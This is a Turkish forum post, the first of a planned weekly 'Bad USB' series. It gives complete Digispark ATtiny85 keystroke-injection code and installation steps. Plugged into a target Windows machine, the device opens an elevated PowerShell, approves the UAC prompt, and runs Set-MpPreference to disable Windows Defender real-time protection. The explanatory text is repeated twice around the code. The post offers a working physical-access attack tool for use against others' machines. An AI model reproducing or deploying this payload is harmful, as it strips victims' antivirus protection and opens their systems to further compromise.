Windows Runtime AV Devre Dışı Bırakmak // Yoda İle Bad Usb Part 1
https://github.com/maaami98/Badusb Türkçe q klavye sorununu çözmek için bu kütüphaneyi kuruyoruz
DigiKeyboard.h dosyasına ok tuşlarını tanımlamak için
Ekliyoruz
Ardından işlemi yapan kodu Ekliyip attiny85 e atıyoruz
Kodu cihazımıza attıktan sonra usb cihazımızı hedef windows sisteme takabiliriz
Çalışma Mantığı :
Windows R ile run`u açtıktan sonra "powershell Start-Process powershell -Verb runAs" yazıyor bu powershellde "Start-Process powershell -Verb runAs" komutunu çalıştırmaya yarıyor bu komut ise admin yetkilerine sahip başka bir powershell açıyor sol ok a tıklayarak izin ver e getirip entera basarak admin yetkili powershell açılıyor powershell e "Set-MpPreference -DisableRealtimeMonitoring $true ; exit" yazıp çalıştırarak önce "et-MpPreference -DisableRealtimeMonitoring $true" komutunu ";" ile yeni satıra geçerek exit komutunu çalıştırarak powershellden çıkıyor
Konum Bukadardı Konuda Driver kurulumları ardunio ide ile digispark kullanımı vb. şeylerden bahsedilmemiştir bu tarz birşeye ihtiyaç duyuyorsanız aşşağıda belirtebilirsiniz onunla alakalı bir konu açabilirim
Bu seride her hafta 1 bölüm olacak şekilde kendi yaptığım bad usb projelerini paylaşmayı planlıyorum bu şekilde kendim öğrenirken sizede öğretmiş oluyorum fikirlerinizi aşşağıda belirtebilirsiniz
https://github.com/maaami98/Badusb Türkçe q klavye sorununu çözmek için bu kütüphaneyi kuruyoruz
DigiKeyboard.h dosyasına ok tuşlarını tanımlamak için
Kod:
[CENTER]#define KEY_UP_ARROW 0x52
#define KEY_DOWN_ARROW 0x51
#define KEY_LEFT_ARROW 0x50
#define KEY_RIGHT_ARROW 0x4F
[/CENTER]
Ekliyoruz
Ardından işlemi yapan kodu Ekliyip attiny85 e atıyoruz
Kod:
#include "DigiKeyboard.h"
**** setup() {
//empty
}
**** loop() {
//DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print("powershell Start-Process powershell -Verb runAs");
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_LEFT_ARROW);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(5000);
DigiKeyboard.print("Set-MpPreference -DisableRealtimeMonitoring $true ; exit");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;){ /*empty*/ }
}
Kodu cihazımıza attıktan sonra usb cihazımızı hedef windows sisteme takabiliriz
Çalışma Mantığı :
Windows R ile run`u açtıktan sonra "powershell Start-Process powershell -Verb runAs" yazıyor bu powershellde "Start-Process powershell -Verb runAs" komutunu çalıştırmaya yarıyor bu komut ise admin yetkilerine sahip başka bir powershell açıyor sol ok a tıklayarak izin ver e getirip entera basarak admin yetkili powershell açılıyor powershell e "Set-MpPreference -DisableRealtimeMonitoring $true ; exit" yazıp çalıştırarak önce "et-MpPreference -DisableRealtimeMonitoring $true" komutunu ";" ile yeni satıra geçerek exit komutunu çalıştırarak powershellden çıkıyor
Konum Bukadardı Konuda Driver kurulumları ardunio ide ile digispark kullanımı vb. şeylerden bahsedilmemiştir bu tarz birşeye ihtiyaç duyuyorsanız aşşağıda belirtebilirsiniz onunla alakalı bir konu açabilirim
Moderatör tarafında düzenlendi: